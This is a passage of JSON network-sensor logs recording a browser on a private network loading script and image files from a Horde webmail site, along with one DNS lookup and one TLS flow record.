Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} 
{"timestamp":"2020-02-29T00:23:13.582471+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} {"timestamp":"2020-02-29T00:23:13.584270+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":3}} {"timestamp":"2020-02-29T00:23:13.584818+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.585514+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:23:13.588348+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":6}} 
{"timestamp":"2020-02-29T00:23:13.588817+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:23:13.592254+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.592593+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} 
{"timestamp":"2020-02-29T00:23:13.593849+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":4}} {"timestamp":"2020-02-29T00:23:13.592875+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:23:13.594116+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} 
{"timestamp":"2020-02-29T00:23:13.642877+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/imp.js","state":"CLOSED","stored":false,"size":5736,"tx_id":8}} {"timestamp":"2020-02-29T00:23:13.685357+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191}} {"timestamp":"2020-02-29T00:23:13.744096+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/popdown.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":191},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/popdown.png","state":"CLOSED","stored":false,"size":191,"tx_id":9}} {"timestamp":"2020-02-29T00:23:13.744418+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:23:13.766355+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert.png","state":"CLOSED","stored":false,"size":131,"tx_id":10}} {"timestamp":"2020-02-29T00:23:13.768362+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478}} {"timestamp":"2020-02-29T00:23:13.770424+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":478},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.png","state":"CLOSED","stored":false,"size":478,"tx_id":11}} {"timestamp":"2020-02-29T00:23:13.775452+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340}} {"timestamp":"2020-02-29T00:23:13.776683+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":5}} {"timestamp":"2020-02-29T00:23:13.777482+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:23:13.777995+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":6}} {"timestamp":"2020-02-29T00:23:13.778444+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":340},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_off.png","state":"CLOSED","stored":false,"size":340,"tx_id":12}} {"timestamp":"2020-02-29T00:23:13.794129+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:23:13.803596+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:23:13.804330+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":7}} {"timestamp":"2020-02-29T00:23:13.804922+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:23:13.810002+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":32775,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.834778+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":13}} 
{"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.921148+0000","flow_id":2045141807356946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":32775,"proto":"UDP","dns":{"type":"answer","id":57668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:14.000285+0000","flow_id":461862238728569,"event_type":"flow","src_ip":"192.168.10.130","src_port":34264,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2088,"bytes_toclient":1452,"start":"2020-02-29T00:22:04.110969+0000","end":"2020-02-29T00:22:09.135688+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954}} 
{"timestamp":"2020-02-29T00:23:14.006648+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.040185+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":954},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2491,"tx_id":14}} {"timestamp":"2020-02-29T00:23:14.042385+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":8}} {"timestamp":"2020-02-29T00:23:14.042940+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:23:14.055569+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} 
{"timestamp":"2020-02-29T00:23:14.056125+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:23:14.056812+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:23:14.057009+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":9}} 
{"timestamp":"2020-02-29T00:23:14.057388+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":2}} {"timestamp":"2020-02-29T00:23:14.057826+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:23:14.058591+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 